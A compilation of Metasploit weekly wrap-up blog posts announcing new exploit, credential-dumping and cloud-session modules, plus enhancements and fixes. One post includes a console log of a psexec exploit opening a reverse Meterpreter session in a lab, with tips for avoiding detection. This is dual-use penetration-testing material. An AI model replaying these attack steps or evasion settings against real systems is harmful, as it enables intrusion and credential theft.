All posts by Grant Willcox

Metasploit Weekly Wrap-Up

2023-06-07 Grant Willcox

Post Syndicated from Grant Willcox original https://blog.rapid7.com/2023/06/07/metasploit-weekly-wrap-up-13/

Cloud Fun With EC2

Metasploit Weekly Wrap-Up

New ground was broken today with the addition of two PRs from community contributor sempervictus, also known as RageLtMan, who added the ability for Metasploit to establish sessions to EC2 instances using Amazon’s SSM interface, which provides a public API to execute commands or create real-time interactive websocket command shells. This can result in passwordless elevation of privilege in most if not all cases.

This module is also very helpful as it provides pentesters with the tools required to show the impact of having SSM exposed and can help reinforce the importance of data governance, locality, isolation, and auditing. It can also show how user-based access control systems may be bypassed by the privileges users within IAM have using the SSM interface as an elevation of privilege pivot. Finally, it can also be used to demonstrate how attackers can exfiltrate data from systems which do not have network access outside of the cloud environment.

Contacts Are Like Cookies – I Need More

Community contributors Nolan LOSSIGNOL-DRILLIEN and Vladimir TOUTAIN added a module for exploiting a preauthentication contact database dump vulnerability in Dolibarr 16 prior to 16.0.5. Contact details are a great help for attackers as they can allow them to craft more believable phishing attacks and gain more information about the internal structure of a target company. They can also give information on a company’s relationships with other companies which could reveal information about sensitive company dealings.

Router Exploits – They Never Stop

Router exploits are like fine wine. They just don’t stop, and these devices are often left unpatched for years on end, which can lead to issues where they are compromised and used in attacks such as in the case of the Mirai botnet. Community contributors Anna Graterol, Mana Mostaani, and Nick Cottrell added a new module targeting CVE-2015-3035 which uses a directory traversal vulnerability in unpatched TP-LINK Archer C7 routers to dump arbitrary files on the target such as the /etc/passwd‘s file.

New module content (7)

Amazon Web Services EC2 instance enumeration

Author: RageLtMan
Type: Auxiliary
Pull request: #17430 contributed by sempervictus

Description: This adds the ability for Metasploit to establish sessions to EC2 instances using Amazon’s SSM interface. The result is an interactive shell that does not require the user to transfer a payload to the EC2 instance. For Windows targets, the shell is a a PTY enabled Powershell session that is incompatible with Post modules but supports user interaction.

VSFTPD 2.3.2 Denial of Service

Authors: Anna Graterol, Maksymilian Arciemowicz, Mana Mostaani, and Nick Cottrell (Rad10Logic)
Type: Auxiliary
Pull request: #18004 contributed by rad10
AttackerKB reference: CVE-2011-0762

Description: This PR adds an auxiliary module for DOSing a VSFTPD server from version 2.3.2 and below.

Apache NiFi Login Scanner

Author: h00die
Type: Auxiliary
Pull request: #18028 contributed by h00die

Description: A new scanner module has been added to scan for valid logins for Apache NiFi servers.

Apache NiFi Version Scanner

Author: h00die
Type: Auxiliary
Pull request: #18025 contributed by h00die

Description: This PR adds a version scanner for Apache NiFi.

Archer C7 Directory Traversal Vulnerability

Authors: Anna Graterol, Mana Mostaani, and Nick Cottrell
Type: Auxiliary
Pull request: #18003 contributed by rad10
AttackerKB reference: CVE-2015-3035

Description: This adds a module that gather a specific file by leveraging a directory traversal vulnerability in TP-LINK Archer C7 routers. This vulnerability is identified as CVE-2015-3035.

Dolibarr 16 pre-auth contact database dump

Authors: Nolan LOSSIGNOL-DRILLIEN and Vladimir TOUTAIN
Type: Auxiliary
Pull request: #17899 contributed by vtoutain

Description: This adds a module that leverages an authorization bypass in Dolibarr version 16, prior to 16.0.5. This module dumps the contact database to retrieve customer file, prospects, suppliers and employee information. No authentication is needed for this exploit.

AWS SSM Sessions

Author: sempervictus
Type: Payload
Pull request: #17430 contributed by sempervictus

Description: This adds the ability for Metasploit to establish sessions to EC2 instances using Amazon’s SSM interface. The result is an interactive shell that does not require the user to transfer a payload to the EC2 instance. For Windows targets, the shell is a PTY enabled PowerShell session that is incompatible with Post modules but supports user interaction.

Enhancements and features (2)

#18021 from zeroSteiner – The PowerShell Post API methods use a mix of PowerShell and .NET methods which have different ways of keeping track of the current working directory. This changes fixes the ambiguity by synchronizing the current working directory referenced by each set of methods.
#18031 from wvu – Updates edit and log commands to explain to how to set LocalEditorand LocalPager so that users can adjust the editor that is used when running the edit command and the log file that is used for logging module runtime information, respectively.

Bugs fixed (6)

#18019 from cgranleese-r7 – Fixes validation for the to_handler command when running Evasion and Payload modules.
#18026 from adfoster-r7 – A bug has been fixed in test modules whereby not all modules were manipulating the load path to require the module_test library correctly, resulting on them being dependent on other modules correctly setting the load path, which may not always occur.
#18030 from wvu – A missing return statement was added into lib/msf/core/exploit/cmd_stager/http.rb to fix a Ruby syntax error when attempting to handle a 404 file not found case.
#18032 from wvu – A bug has been fixed in the cmd/brace encoder whereby it did not appropriately escape braces.
#18036 from adfoster-r7 – A typo has been fixed in the ibm_sametime_enumerate_users.rb gather module that prevented exceptions that were raised from being appropriately caught.
#18052 from adfoster-r7 – The test/modules/post/test/file.rb module previously did not work on Windows sessions due to it reading data from a Linux only file to determine what data to write for the binary file write operation. This has since been fixed so that the binary data is randomly generated vs being based off an OS specific file.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

2023-03-17 Grant Willcox

Post Syndicated from Grant Willcox original https://blog.rapid7.com/2023/03/17/metasploit-weekly-wrap-up-196-2/

FortiNAC EITW Content Added

Metasploit Weekly Wrap-Up

Whilst we did have a few cool new modules added this week, one particularly interesting one was a Fortinet FortiNAC vulnerability, CVE-2022-39952, that was added in by team member Jack Heysel. This module exploits an unauthenticated RCE in Fortinet FortiNAC versions 9.4.0, 9.2.0 through 9.2.5, 9.1.0 through 9.1.7, 8.8.0 through 8.8.11, 8.7.0 through 8.7.6, 8.6.0 through 8.6.5, 8.5.0 through 8.5.4, and 8.3.7 to gain root level access to affected devices. This bug has seen active exploitation in the wild from several threat feeds such as ShadowServer at https://twitter.com/Shadowserver/status/1628140029322362880, so definitely patch if you haven’t done so already.

Tomcat Gives Me All The Shells

One other exploit we did want to call out this week was a local privilege escalation on Apache Tomcat prior to 7.0.54-8. Tomcat is widely deployed in a lot of environments, and this PR, exploiting CVE-2016-5425, allows you to escalate from an authenticated user to full root control over a web server by exploiting a file permissions issue. These vulnerabilities can be quite beneficial to attackers looking to gain further access to a network as often they will compromise a web server and then use that web server to start pivoting deeper into the network. Gaining root access to a web server can further assist them with these efforts. It’s also rather unusual to see a web server specifically being used to assist with local privilege escalation as most exploits tend to focus on using them to gain initial access, so we appreciate the efforts from h00die to add this into Metasploit.

New module content (3)

Fortinet FortiNAC keyUpload.jsp arbitrary file write

Authors: Gwendal Guégniaud, Zach Hanley, and jheysel-r7
Type: Exploit
Pull request: #17750 contributed by jheysel-r7
AttackerKB reference: CVE-2022-39952

Description: A new exploit has been added for CVE-2022-39952, a vulnerability in FortiNAC’s keyUpload.jsp page which allows for arbitrary file write as an unauthenticated user. Successful exploitation results in unauthenticated RCE in the context of the root user, giving full control over the target device.

Apache Tomcat on RedHat Based Systems Insecure Temp Config Privilege Escalation

Authors: Dawid Golunski and h00die
Type: Exploit
Pull request: #17509 contributed by h00die
AttackerKB reference: CVE-2016-5425

Description: This PR adds an exploit that targets a vulnerability in RedHat based systems where improper file permissions are applied to /usr/lib/tmpfiles.d/tomcat.conf for Apache Tomcat versions before 7.0.54-8, allowing attackers to inject commands into the systemd-tmpfiles service to write a cron job that will execute their payload. Successful exploitation should result in privilege escalation to the root user.

Bitbucket Environment Variable RCE

Authors: Ry0taK, Shelby Pace, and y4er
Type: Exploit
Pull request: #17775 contributed by space-r7
AttackerKB reference: CVE-2022-43781

Description: This adds an exploit module for CVE-2022-43781, an authenticated command injection vulnerability in various versions of Bitbucket. Arbitrary command execution is done by injecting specific environment variables into a user name and coercing the Bitbucket application into generating a diff. This module requires at least admin credentials. Successful exploitation results in RCE as the atlbitbucket user.

Enhancements and features (1)

#17757 from adfoster-r7 – Updates the formatting logic for info command to improve the readability of the module description. Previously the module description was squashed into a single line, but now each paragraph and bullet list etc will be rendered on their own new lines.

Bugs fixed (1)

#17774 from adfoster-r7 – A bug has been fixed when displaying the Metasploit banner due to use of an undefined function; this has been updated to use the proper function.

Documentation added (1)

#17780 from gwillcox-r7 – This updates the list of mentors for GSoC 2023.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

Metasploit Weekly Wrap-Up

2022-10-07 Grant Willcox

Post Syndicated from Grant Willcox original https://blog.rapid7.com/2022/10/07/metasploit-weekly-wrap-up-179/

Bofloader – Windows Meterpreter Gets Beacon Object File Loader Support

Metasploit Weekly Wrap-Up

This week brings a new and frequently requested feature to the Windows Meterpreter, the Beacon Object File loader. This new extension, bofloader, allows for users to execute Beacon Object Files as written for either Cobalt Strike or Sliver. This extension was provided by a group effort among community members kev169, GuhnooPlusLinux, R0wdyJoe, and skylerknecht.

Documentation is available on the new docs site which walks through using the new extension. Since the bofloader is a full-fledged extension, it can be used without loading stdapi which has been noted as an important setting (set AutoLoadStdapi false) for avoiding detection.

Once a Meterpreter session is loaded along with the bofloader extension, the execute_bof command becomes available. The user needs to specify a path to their BOF file and any necessary arguments.

msf6 exploit(windows/smb/psexec) > set AutoLoadStdapi false
AutoLoadStdapi => false
msf6 exploit(windows/smb/psexec) > exploit


[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.10:445 - Connecting to the server...
[*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445 as user 'smcintyre'...
[*] 192.168.159.10:445 - Selecting PowerShell target
[*] 192.168.159.10:445 - Executing the payload...
[+] 192.168.159.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (200774 bytes) to 192.168.159.10
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.10:62900) at 2022-10-07 12:10:21 -0400


meterpreter > load bofloader
Loading extension bofloader...

meterpreter                  
   ▄▄▄▄    ▒█████    █████▒  
  ▓█████▄ ▒██▒  ██▒▓██   ▒   
  ▒██▒ ▄██▒██░  ██▒▒████ ░   
  ▒██░█▀  ▒██   ██░░▓█▒  ░   
  ░▓█  ▀█▓░ ████▓▒░░▒█░      
  ░▒▓███▀▒░ ▒░▒░▒░  ▒ ░      
  ▒░▒   ░   ░ ▒ ▒░  ░     ~ by @kev169, @GuhnooPluxLinux, @R0wdyJoe, @skylerknecht ~
   ░    ░ ░ ░ ░ ▒   ░ ░      
   ░          ░ ░  loader    
        ░                    


Success.
meterpreter > execute_bof ../CS-Situational-Awareness-BOF/SA/whoami/whoami.x64.o
[*] No arguments specified, executing bof with no arguments.


UserName		SID
====================== ====================================
MSFLAB\DC$	S-1-5-18




GROUP INFORMATION                                 Type                     SID                                          Attributes               
================================================= ===================== ============================================= ==================================================
BUILTIN\Administrators                            Alias                    S-1-5-32-544                                  Enabled by default, Enabled group, Group owner, 
Everyone                                          Well-known group         S-1-1-0                                       Mandatory group, Enabled by default, Enabled group, 
NT AUTHORITY\Authenticated Users                  Well-known group         S-1-5-11                                      Mandatory group, Enabled by default, Enabled group, 
Mandatory Label\System Mandatory Level            Label                    S-1-16-16384                                  Mandatory group, Enabled by default, Enabled group, 




Privilege Name                Description                                       State                         
============================= ================================================= ===========================
SeAssignPrimaryTokenPrivilege Replace a process level token                     Disabled                      
...             


meterpreter >

If MinGW is available, BOF files can be compiled from source code using the –compile flag.

meterpreter > execute_bof ../../OutputStreams.c --compile
[*] No arguments specified, executing bof with no arguments.
[CALLBACK_OUTPUT]: message
[CALLBACK_ERROR]:  message

meterpreter >

Finally, BOF files which require arguments can be called if the user knows their format. This information would typically come from either reading the BOF file’s source code or documentation. In the following example, the nslookup BOF takes two UTF-8 strings, followed by one int16. The format string details can be found in the documentation along with a table for quick reference in the --help output.

meterpreter > execute_bof ../CS-Situational-Awareness-BOF/SA/nslookup/nslookup.x64.o --format-string zzs metasploit.com 192.168.250.4 1
A metasploit.com 18.67.65.57
A metasploit.com 18.67.65.86
A metasploit.com 18.67.65.104
A metasploit.com 18.67.65.65
NS com f.gtld-servers.net
NS com a.gtld-servers.net
...

meterpreter >

WordPress Elementor RCE – CVE-2022-1329

This week community contributors AkuCyberSec, Ramuel Gall, and h00die landed a nice module for CVE-2022-1329, an authenticated vulnerability in the Elementor Website Builder Plugin for WordPress that allows unauthorized execution of several AJAX actions.

Any authenticated user can exploit this vulnerability to upload a PHP file onto the website. The module takes advantage of this vulnerability to request that the Elementor plugin try to install Elementor Pro from a user supplied zip file, which is something any user wih Subscriber permissions or higher can do. Once the PHP file is uploaded to the target website, the attacker can then browse to the page hosting their PHP file to get RCE as the www-data user.

Ubuntu Enlightment Mount Priv Esc – CVE-2022-37706

Its been a while since we last had a Linux LPE in the framework for Ubuntu, but thanks to some work from community contributors Maher Azzouzi and h00die, we have an exploit for CVE-2022-37706. This takes advantage of a bug within one of Linux’s window managers, called Enlightment, and occurs due to a command injection vulnerability in Enlightment’s enlightment_sys binary. Versions prior to Enlightment 0.25.4 are vulnerable and can be exploited by authenticated users who have a userland shell to gain arbitrary code execution as the root user.

Remote Mouse Server RCE – Unpatched

Community contributors 0RPHON, H4rk3nz0, and h00die brought us a nice vulnerability this week for an unauthenticated RCE via the Emote Interactive protocol, aka CVE-2022-3365. The bug occurs since the authentication for the Emote Interactive protocol never seemed to be enforced according to 0RPHON, the original bug discoverer. Attackers can utilize this vulnerability to gain unauthenticated RCE as the user running Remote Mouse Server. Note that whilst a CVE is assigned, the bug is still unpatched at the time of writing.

New module content (6)

Ubuntu Enlightenment Mount Priv Esc by Maher Azzouzi and h00die, which exploits CVE-2022-37706 – This PR adds a local privilege escalation module. It exploits a cmd injection vulnerability in the window manager, Enlightenment, on Ubuntu.
WordPress Plugin Elementor Authenticated Upload Remote Code Execution by AkuCyberSec, Ramuel Gall, and h00die, which exploits CVE-2022-1329 – This PR adds a new authenticated exploit module against 3 versions of Elementor, a plugin for WordPress. Any user account can use this exploit. It was rated a 9.9 CVSS score and was assigned CVE-2022-1329.
Remote Mouse RCE by 0RPHON, H4rk3nz0, and h00die, which exploits CVE-2022-3365 – This module utilizes the Remote Mouse Server by Emote Interactive protocol to deploy a payload and run it from the server, achieving unauthenticated code execution as the user running the server.
Windows Gather MobaXterm Passwords by cn-kali-team – This module will determine if MobaXterm is installed on the target system and, if it is, it will try to dump all saved session information from the target. The passwords for these saved sessions will then be decrypted where possible.
RedisDesktopManager credential gatherer by cn-kali-team – This PR adds a post module leveraging the existing PackRat library to pull credentials from RedisDesktopManager installations.
Delinea Thycotic Secret Server Dump by npm-cesium137-io – This PR adds a post exploitation module that exports and decrypts Thycotic Secret Server credentials.

Enhancements and features (3)

#16995 from Invoke-Mimikatz – This PR adds a new extension for the C (x86/x64) Meterpreter payload. The extension is called bofloader and can be used to execute COFF files (also known as Beacon Object Files) in the context of the Meterpreter session. It currently adds only one command, bof_cmd, to Meterpreter.
#17086 from bwatters-r7 – This PR bumps Metasploit-payloads to a level that allows support for COFF loading per https://github.com/rapid7/metasploit-framework/pull/16995
#17108 from k0pak4 – Updates the azure_ad_login auxiliary module to check for disabled accounts.

Bugs fixed (3)

#17072 from smashery – This PR fixes a regression discovered when session interaction hangs because a file slated for cleanup is in use, so the framework side times out, but the shell side does not. The fix also includes more robust handling for shell tokens in all types of shells.
#17078 from cgranleese-r7 – This PR updates the deprecated report_auth_info method calls in the modules/auxiliary/scanner/rservices/ modules to now make use of create_credential instead.
#17091 from bcoles – Fixes module metadata for stability and reliability for several modules.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

Metasploit Weekly Wrap-Up

2022-07-15 Grant Willcox

Post Syndicated from Grant Willcox original https://blog.rapid7.com/2022/07/15/metasploit-weekly-wrap-up-166/

JBOSS EAP/AS – More Deserializations? Indeed!

Metasploit Weekly Wrap-Up

Community contributor Heyder Andrade added in a new module for a Java deserialization vulnerability in JBOSS EAP/AS Remoting Unified Invoker interface for versions 6.1.0 and prior. As far as we can tell this was first disclosed by Joao Matos in his paper at AlligatorCon. Later a PoC from Marcio Almeida came out that Heyder Andrade used as the basis for his Metasploit module. The exploit allows an unauthenticated attacker with network access to JBOSS EAP/AS <= 6.1.0 Remoting Unified Invoker interface to gain RCE as the user jboss by sending a crafted serialized object to this interface.

Deserialization attacks have certainly been quite popular as of late but we haven’t seen many in JBOSS lately so we appreciate the efforts of these contributors to provide us with some alternative deserialization attacks 🙂

More Unauthenticated RCEs – Sourcegraph gitserver sshCommand RCE

One unauthenticated RCE is nice for a weekly wrapup, but we can always do better. Why not make it two this week? Courtesy of Spencer McIntyre and Altelus1‘s PoC, we now have a Metasploit module for CVE-2022-23642, an unauthenticated RCE in Sourcegraph Gitserver prior to 3.37.0 that allows attackers to execute arbitrary OS commands by modifying the core.sshCommand value within the git configuration. Successful exploitation will allow an unauthenticated attacker to execute commands in the context of the Sourcegraph Gitserver server.

This is another cool attack, as we don’t often see these types of configuration-related issues leading to unauthenticated RCE; typically when they do crop up, there are limitations on what one can do. However in this case we ended up with a full RCE as an unauthenticated user, which goes to show that even less common or more frequently overlooked issues under the right scenario can be exploited to gain privileged access.

Decrypting Ya Secrets – Citrix Netscaler Secrets Decrypter

Finally, community contributor npm-cesium137-io added a new module to decrypt Citrix Netscaler appliance configuration files and recover secrets encrypted with the KEK encryption scheme, provided you have the key fragment files.

We have heard both from npm-cesium137-io and others that Citrix Netscaler has been seen on a number of pen testing engagements so hopefully this module should assist those pen testing these environments by allowing them to more easily obtain secrets during their engagements.

New module content (3)

Decrypt Citrix NetScaler Config Secrets by npm-cesium137-io – This auxiliary module allows users to decrypt secrets in Citrix NetScaler appliance configuration files.
Sourcegraph gitserver sshCommand RCE by Altelus1 and Spencer McIntyre, which exploits CVE-2022-23642 – This module leverages an unauthenticated RCE in Sourcegraph’s gitserver component which results in OS command execution in the context of gitserver.
JBOSS EAP/AS Remoting Unified Invoker RCE by Heyder Andrade, Joao Matos, and Marcio Almeida – This module exploits a Java deserialization vulnerability in JBOSS EAP/AS Remoting Unified Invoker interface for versions 6.1.0 and prior.

Enhancements and features (2)

#16735 from ErikWynter – This change sets the MeterpreterTryToFork advanced payload option to true by default for the Linux target in the aerohive_netconfig_lfi_log_poison_rce module to prevent the application from hanging once exploited.
#16764 from bcoles – Adds two new HTTP client evasion options to msfconsole HTTP::shuffle_get_params, and HTTP::shuffle_post_params that allow users to randomize the order of the POST and GET parameters to evade static signatures.

Bugs fixed (5)

#16617 from NikitaKovaljov – This fixes a race condition that was present in the ipv6_neighbor module that caused hosts to be missed when the scanned range was very short due to an adaptive timeout with an insufficient floor value.
#16703 from e2002e – This fixes compatibility issues with the Censys V2 API and the censys_search.rb module.
#16718 from cdelafuente-r7 – This fixes the run_as library and module to work correctly on 64-bit systems.
#16727 from bcoles – Modules that use the tftp command stager fail due to a missing tftphost option. This ensures that the tftphost host is set and valid before proceeding with creating the command stager.
#16736 from ErikWynter – This change fixes a bug in the confluence_widget_connector exploit module to prevent it from crashing when the HTTP response body received in the get_java_property method is empty or does not match expected regex.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

Metasploit Weekly Wrap-Up

2022-07-01 Grant Willcox

Post Syndicated from Grant Willcox original https://blog.rapid7.com/2022/07/01/metasploit-weekly-wrap-up-164/

SAMR Auxiliary Module

Metasploit Weekly Wrap-Up

A new SAMR auxiliary module has been added that allows users to add, lookup, and delete computer accounts from an AD domain. This should be useful for pentesters on engagements who need to create an AD account to gain an initial foothold into the domain for lateral movement attacks, or who need to use this functionality as an attack primitive.

Note when using this module that there is a standard number of computers a user can add, so be wary that you may get STATUS_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED error messages if you try to run this repeatedly. It should also be noted that whilst a standard user can create a computer account, you will need additional privileges to delete that account.

A Pesky Table Bug Gets Squashed

A well known bug in Rex-Tables when trying to render tables which contain unsupported characters has now been fixed in Rex-Text 0.2.38, which has now been pulled into the framework. This should solve a number of issues that have been reported over the last year such as https://github.com/rapid7/metasploit-framework/issues/15833, https://github.com/rapid7/metasploit-framework/issues/14955, and https://github.com/rapid7/metasploit-framework/issues/15044. It should also help improve experiences with some of the new LDAP work we have been working on lately, so that users should have a smoother experience once that releases.

PHP Mailer Argument Injection Module Improvements

As a final point of note, community contributor erikbomb has improved the PHP Mailer Argument Injection exploit targeting CVE-2016-10033 and CVE-2016-10045 to now support changing the name of the fields for the name, email, and message objects. This should allow this exploit to work under additional scenarios where these settings may need to be altered for the exploit to successfully run. Much thanks to erikbomb for these enhancements!

New module content (1)

SAMR Computer Management by JaGoTu and Spencer McIntyre – This adds an auxiliary module that can be used to add, lookup, and delete computer accounts from an active directory domain. The computer account can offer a sort of foothold into the domain for lateral movements or as a common attack primitive.

Enhancements and features (1)

#16721 from erikbomb – This updates the PHP Mailer Argument Injection exploit to allow setting the names of certain fields via advanced options. These configuration options then allow the exploit to work in additional scenarios.

Bugs fixed (2)

#16722 from bcoles – Fixes module metadata for stability and reliability.
#16729 from gwillcox-r7 – Fixes a crash in Metasploit’s console when trying to render tables which contain unsupported characters.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

Metasploit Weekly Wrap-Up

2022-06-17 Grant Willcox

Post Syndicated from Grant Willcox original https://blog.rapid7.com/2022/06/17/metasploit-weekly-wrap-up-162/

vCenter Secret Extracter

Metasploit Weekly Wrap-Up

Expanding on the work of the vcenter_forge_saml_token auxiliary module, community contributor npm-cesium137-io has added a new module for extracting the vmdir/vmafd certificates, the IdP keypair, the VMCA root cert, and anything from vmafd that has a private key associated, from an offline copy of the services database. This information can then be used with the vcenter_forge_saml_token module to gain a session cookie that grants access to the SSO domain as a vSphere administrator.

Great work by npm-cesium137-io to complete this exploit chain and provide users a full end to end solution to get administrative level privileges on a vCenter/vSphere server given an offline copy of the services database!

Named Pipe Pivoting Documentation Updates

Historically speaking named pipe pivoting has been an area of much confusion among users. We have taken note of this and thanks to some help from adfoster-r7 and bwatters-r7, we have added in some documentation for using named pipe pivoting with Windows Meterpreter.

You can find this documentation online on our documentation site at https://docs.metasploit.com/docs/using-metasploit/intermediate/pivoting-in-metasploit.html. Note that since with Metasploit 6.2 our documentation now lives inside of the Metasploit codebase, which you can find at docs/metasploit-framework.wiki/Pivoting-In-Metasploit.md.

Service Library Improvements

Community contributor kalidor noticed that whilst testing a few modules that the Windows Services library we maintain was in need of some updates and was erroring out for him in a number of cases. This turned out to be due to some inappropriately thrown exceptions. After further consultation it was decided a rewrite of the code was needed which not only solved the original issue but also aligned the Windows Services library to more closely align with existing design patterns, ensuring it will be easier to maintain long term.

New module content (1)

VMware vCenter Extract Secrets from vmdir / vmafd DB File by npm – This module extracts the vmdir / vmafd certificates from an offline copy of the service database (i.e. a vCenter backup). Right now it will pull the IdP keypair, the VMCA root cert, and anything from vmafd that has a private key associated.

Enhancements and features (1)

#16654 from adfoster-r7 – This PR adds documentation for using named pipe pivoting with Windows Meterpreter.

Bugs fixed (3)

#16602 from kalidor – If a user restarted a service using lib/msf/core/post/windows/services.rb an exception would be thrown as a integer instead of as a string, which would cause an error to occur. This has been fixed by rewriting the code for the service_restart to use more appropriate logic. Additionally, the documentation has been updated for lib/msf/core/post/windows/services.rb to note which functions may throw exceptions.
#16627 from bwatters-r7 – The tools/modules/update_payload_cached_sizes.rb script has been updated to contain additional exception handling to appropriately handle any exceptions that may be thrown during runs, and then print out a list of those exceptions at the end of the run.
#16665 from adfoster-r7 – A missing import has been fixed in /tools/exploit/random_compile_c.rb, allowing it to now compile C files as expected.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

Metasploit Wrap-Up

2022-02-04 Grant Willcox

Post Syndicated from Grant Willcox original https://blog.rapid7.com/2022/02/04/metasploit-wrap-up-147/

WordPress Exploitation Returns

Metasploit Wrap-Up

What’s life without a little WordPress exploitation? Courtesy of Hacker5preme (aka Ron Jost) and h00die, we now have an exploit for CVE-2021-24862, a bug in the RestorationMagic WordPress plugin prior to 5.0.1.6 whereby user input was not properly escaped in the rm_chronos_ajax action prior to it being used in an SQL statement.

By utilizing this module, authenticated attackers can grab the usernames and password hashes of users on the affected WordPress site, which could then be cracked using hashcat or John The Ripper to get the plaintext password.

Since users are prone to reusing their passwords across sites this module could potentially allow attackers who successfully cracked a users password to successfully log into other sites, which is a practice commonly known as credential stuffing. As a reminder, it is recommended to use unique passwords for each site to mitigate against credential stuffing attacks.

Whilst the risk of this is somewhat mitigated by the fact that valid login credentials are required, keep in mind that RestorationMagic is designed to be a user registration form plugin and is designed to help register users onto your WordPress site, so in most cases all an attacker would just have to do is just register and gain a user account on the target site to exploit this bug.

Unauthenticated Cisco Small Business RV Series Command Injection – Cisco Spiciness Returns

Its always good when we get a Cisco module, as these devices are used all over the place. Takeshi Shiomitsu and Rapid7’s Jacob Baines certainly delivered on this front with a module for exploiting CVE-2021-1473, which combines an authentication bypass with a command injection vulnerability to execute code as the www-data user on vulnerable Cisco RV Series VPNs and Routers running firmware versions 1.0.03.20 and below.

Because of the sensitivity of data that Cisco routers process as well as the level of access they often have, Cisco routers have often been a prime target for exploitation in the past. It is likely that in the wild exploitation of this vulnerability will occur in the near future, so if you haven’t patched this vulnerability already, it is highly encouraged to do so soon.

New module content (3)

WordPress RegistrationMagic task_ids Authenticated SQLi by Hacker5preme (Ron Jost) and h00die, which exploits CVE-2021-24862 – This adds an exploit for CVE-2021-24862 which is an authenticated SQL injection vulnerability within the RegistrationMagic WordPress plugin.
Cisco Small Business RV Series Authentication Bypass and Command Injection by Takeshi Shiomitsu and jbaines-r7, which exploits CVE-2021-1473 – This adds an exploit for various Cisco RV series VPNs / Routers for firmware versions 1.0.03.20 and below. The module exploits both an auth bypass vulnerability and command injection vulnerability to achieve unauthenticated code execution as the www-data user against vulnerable devices.
Nops: Add cmd/generic by bcoles – A new NOP module, modules/nop/cmd/generic, has been added which supports adding NOPs to command line payloads using spaces for NOP characters.

Enhancements and features

#15994 from timwr – This updates Metasploit’s RPC functionality to support reading the result of external commands which have been executed in a console.
#16014 from sjanusz-r7 – This adds human readable long-form option names to various commands such as save/connect/search and more.
#16112 from zeroSteiner – This updates the PHP Meterpreter’s delete dir functionality to recursively delete directories, and adds validation to the getsystem command on Windows Meterpreter.
#16113 from bcoles – A new NOP module, modules/nop/cmd/generic, has been added which supports adding NOPs to command line payloads using spaces for NOP characters.
#16132 from red0xff – Enhancement to the MySQL injection library’s blind injection techniques now avoid usage of < and > characters to improve compatibility.

Bugs fixed

#16025 from 3V3RYONE – This fixes an issue with msfdb init on windows when opting not to initialize web services.
#16066 from sjanusz-r7 – This fixes a bug were Meterpreter scripts did not correctly receive arguments as part of the sessions command. Note that Meterpreter scripts are deprecated and have been replaced with Post modules.
#16109 from bcoles – This fixes a crash in post/windows/gather/enum_domains when no domains are found.
#16114 from bcoles – A bug existed in PayloadGenerator::prepend_nops whereby if no Nops modules existed for the target payload architecture, the payload would be vaporized and replaced with an array of Nop modules as a string. This was fixed. Now if no Nop modules exist for the target payload architecture, the raw shellcode is returned unmodified.
#16119 from mrshu – This change fixes an incorrect user-agent in modules/auxiliary/dos/http/slowloris.py.
#16123 from AtmegaBuzz – This fixes the missing full disclosure reference URL in the exploit/linux/http/cisco_ucs_rce module.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

Metasploit Wrap-Up

2021-10-29 Grant Willcox

Post Syndicated from Grant Willcox original https://blog.rapid7.com/2021/10/29/metasploit-wrap-up-136/

OMIGOD It’s RCE

Metasploit Wrap-Up

We are excited to announce that we now have a module for the OMIGOD vulnerability that exploits CVE-2021-38647 courtesy of our very own Spencer McIntyre! Successful exploitation will allow an unauthenticated attacker to gain root level code execution against affected servers. Given that this has seen exploitation in the wild by the Mirai botnet, we hope you’re patched, lest your servers decide to join the zombie horde this Halloween!

Sophos Contributes to the RCE Pile

Continuing the trend of unauthenticated RCE exploits that grant root level code execution, this week we also have an exploit for CVE-2020-25223, an unauthenticated RCE within the Sophos UTM WebAdmin service. Whilst we haven’t yet seen exploitation in the wild of this bug, this is definitely one to patch given its severity. Stay frosty folks!

Guess Who’s Back, Back Again, Apache’s Back, Tell a Friend

Whilst not a marshalling bug (I’m sorry, it’s Halloween some puns are needed), community contributors Ash Daulton, Dhiraj Mishra, and mekhalleh (RAMELLA Sébastien), have added a scanner and exploit for CVE-2021-41773 and CVE-2021-42013, which was based off of work from RootUp, ProjectDiscovery, and HackerFantastic. Path traversal vulnerabilities are relatively easy to exploit, and this got a lot of attention in the news since it’s been a long time since Apache has seen a reliable RCE exploit against it. This is definitely one to patch if you’re running any Apache servers. Successful exploitation will result in remote code execution as the user running the Apache server.

New module content (6)

Squid Proxy Range Header DoS by Joshua Rogers, which exploits CVE-2021-31806 and CVE-2021-31807 – This adds a module that leverages CVE-2021-31806 and CVE-2021-31807 to trigger a denial of service condition in vulnerable Squid proxy servers.
Apache 2.4.49/2.4.50 Traversal RCE scanner by Ash Daulton, Dhiraj Mishra, and mekhalleh (RAMELLA Sébastien), which exploits CVE-2021-41773 and CVE-2021-42013 – This adds both a scanner and exploit module for the two recent path traversal vulnerabilities in the apache2 HTTP server. The RCE module requires mod_cgi to be enabled but can be exploited remotely without any authentication. These vulnerabilities are identified as CVE-2021-41773 and CVE-2021-42013.
Sophos UTM WebAdmin SID Command Injection by wvu and Justin Kennedy, which exploits CVE-2020-25223 – This adds an exploit for CVE-2020-25223 which is an unauthenticated RCE within the Sophos UTM WebAdmin service. Exploitation results in OS command execution as the root user.
